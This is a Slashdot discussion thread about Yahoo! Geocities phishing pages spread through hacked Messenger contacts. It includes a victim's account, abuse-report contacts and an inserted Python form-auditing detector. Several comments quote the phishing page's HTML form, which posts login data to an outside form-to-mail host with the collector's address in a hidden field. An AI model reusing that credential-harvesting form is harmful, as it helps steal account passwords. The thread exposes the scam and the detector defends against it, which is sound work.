Phishing in Yahoo! Geocities?
Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing anything to counter these attacks."
Slashdot asks Van Cutter Romney (Score:3, Funny)
Re:Slashdot asks Van Cutter Romney (Score:1)
Re:Slashdot asks Van Cutter Romney (Score:5, Informative)
Re:Slashdot asks Van Cutter Romney (Score:1)
Thank you for calling the Mr. Obvious show! (Score:2, Funny)
"NOTICE: We collect personal information on this site."
Ya think?!?
I never made the connection! Thanks Mr. Obvious!
something to do (Score:4, Interesting)
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
Re:something to do (Score:2)
Just report to gmail's abuse! (Score:2)
I knew there was something strange going on... (Score:4, Funny)
Re:I knew there was something strange going on... (Score:5, Funny)
I remained silent;
I was not a username.
When they locked up the passwords,
I remained silent;
I was not a password.
When they came for people with sexual orientation,
I did not speak out;
Because I have no idea what that means.
When they came for me,
there was no one left to speak out.
Re:I knew there was something strange going on... (Score:2)
I did not speak out;
Because I have no idea what that means.
I guess you weren't invited to the debriefing.
Re:I knew there was something strange going on... (Score:1)
Re:Dear Penthouse Forum (Score:1)
"Hello, Mr. Semel it looks like your hosting service and IM are under attack. Dinner on Saturday night? Oh, that sounds like a wonderful idea!"
At least this way, someone's going to take notice.
I logged in... (Score:3, Funny)
What gives?
Someone's asleep at the wheel. (Score:5, Funny)
Excellent joke (Score:2, Funny)
I'll be honest. I spent all that time trying to figure out how the website was trying to scam people out of money. Then I realized that it was nothing more than a pun. Great job and very subtle, and it somehow being modded insightful made it even more funny.
Try Right Clicking the Screen (Score:2, Insightful)
Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ [fiberbit.net] to the domain registrar since the form submissi
From the phishing website... (Score:2)
Not only does Flickr make you smell better, it also makes you more attractive.
Oh yeah, I read the title wrong too... (Score:2)
I left him a message (Score:3, Funny)
Username: ohgodatleastspendthe
Password: $5foradomainname
The destination page is a 404 (I don't think it works?).
old news... (Score:1, Redundant)
You are about 8 months late!
I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.
I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.
Ummm (Score:5, Insightful)
Maybe I'm missing something, but why the hell are you asking us?
Re:Ummm (Score:2)
Maybe he expects us to take them down via the slashdot effect.
Terms of service (Score:5, Informative)
Geocities is a kinda abandoned place (So much that webcomics make fun of it [nyud.net]). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.
In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.
(This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).
This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
Re:Terms of service (Score:1)
Fixed in the next version (Score:1)
havinfunfun@gmail.com (Score:2)
Subject: "Yahoo id"
The URL for the mail form that's used is: http://www2.fiberbit.net/form/mailto.cgi [fiberbit.net]
Wonder if gmail/google should do something too (Score:2)
Extract:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo
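The form quoted in the posts above is a login form that POSTs to a third-party form-to-mail CGI, with the recipient in a hidden field, and that pattern can be flagged mechanically when reviewing a reported page. The following is an added example, not part of any post in this thread; the `audit` function, the trusted-suffix list, and the sample hosts and address are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")

class FormAuditor(HTMLParser):
    """Collect each <form>'s action plus its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lowercased
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(
                (a.get("type", "text").lower(), a.get("name", ""), a.get("value", "")))

def audit(html, page_url, trusted_suffixes):
    """Return a list of findings for credential forms on one page."""
    parser = FormAuditor()
    parser.feed(html)
    page_host = urlparse(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        if not any(t == "password" for t, _, _ in form["inputs"]):
            continue  # only forms that collect a password matter here
        # A relative action submits to the host serving the page.
        host = urlparse(form["action"]).hostname or page_host
        if not any(host == s or host.endswith("." + s) for s in trusted_suffixes):
            findings.append(f"password form posts to untrusted host {host}")
        if urlparse(form["action"]).scheme == "http":
            findings.append("password form submits over plain http")
        for t, name, value in form["inputs"]:
            if t == "hidden" and EMAIL_RE.fullmatch(value):
                findings.append(f"hidden field {name} carries a mail recipient")
    return findings

# Constructed sample modelled on the form quoted in the thread; the hosts and
# the address are placeholders, not values from the page.
SAMPLE = """<FORM METHOD="POST" ACTION="http://forms.example.net/form/mailto.cgi">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="collector@example.org">
<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd">
</FORM>"""

if __name__ == "__main__":
    for line in audit(SAMPLE, "http://pages.example.com/user/login.html", ["example.com"]):
        print(line)
```

A genuine sign-in form whose action stays on the brand's own HTTPS host produces no findings, so the three checks together separate the quoted pattern from an ordinary login page.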
Address to report it to (Score:2, Informative)
Security problems (Score:1, Interesting)
yes, we are (Score:3, Informative)
We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.
Please report any instances of situations like those you described to:
http://abuse.yahoo.com/ [yahoo.com] or abuse@yahoo-inc.com
Re:yes, we are (Score:2, Funny)
Re:yes, we are (Score:2)
Sorry if I sound snippy, but do you have even a single person acting to prevent abuse?
I realize that Geocities doesn't bring you any revenue, but Yahoo's business hosting has become such an open sewer of phishing and scams, that I couldn't consider hosting there for a nanosecond, let alone recommend it to anyone else.
Re:yes, we are- unblock/'man' abuse@yahoo.com 1st! (Score:2)
Unblock and properly 'man' abuse@yahoo.com and abuse@yahoo-inc.com then we'll talk about stopping user wrongdoing at Yahoo!
Proof from rfc-ignorant.org:
http://www.rfc-ignorant.org/tools/detail.php?domain=yahoo.com&submitted=1123294881&table=abuse [rfc-ignorant.org]
http://www.rfc-ignorant.org/tools/detail.php?domain=yahoo-inc.com&submitted=1123294118&table=abuse [rfc-ignorant.org]
You corporate tool...
As are about all gain
Oh, C'mon!!!... (Score:3, Informative)
There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan
There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.
Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan
One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.
I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.
If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.
Cheers!
Strat
Been there, done that. (Score:3, Interesting)
I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):
Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/ [myphoto-album.tk]
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006
I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).
I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal data in online accounts like Y!, nor do I remember them. Plus, I signed up for my account like a decade ago.
My buddies on the contact list (had a local backup copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.
I continued to e-mail Y!, but got nowhere. I eventually gave up and told them to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies to fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.
Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk
I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport.
As you can see, social engineering at its best, even on people who know computers. I fell for it.
Re:Been there, done that. (Score:3, Informative)
Fried Phish (PIRT) (Score:1)
h [castlecops.com]